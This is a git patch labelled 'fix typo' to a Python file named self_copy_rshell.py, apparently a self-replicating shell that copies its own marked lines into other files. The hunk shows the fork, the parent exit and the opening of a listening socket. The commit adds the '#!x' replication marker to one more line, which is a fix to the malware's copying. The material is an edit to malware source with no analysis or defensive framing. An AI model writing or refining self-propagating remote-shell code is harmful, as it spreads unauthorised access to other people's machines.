From 1f84dcc0954d92f414b6097be435aa8c7f8e1f9a Mon Sep 17 00:00:00 2001 From: id101010 Date: Fri, 11 Oct 2019 14:19:34 +0200 Subject: [PATCH] fix typo --- self_copy_rshell.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/self_copy_rshell.py b/self_copy_rshell.py index bb29242..7efa3d2 100644 --- a/self_copy_rshell.py +++ b/self_copy_rshell.py @@ -43,7 +43,7 @@ for snippet in os.popen(cmd).readlines(): #!x pid = os.fork() #!x # make sure we are in the child process if pid > 0: #!x - sys.exit(0) + sys.exit(0) #!x try: #!x # create the socket and listen s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #!x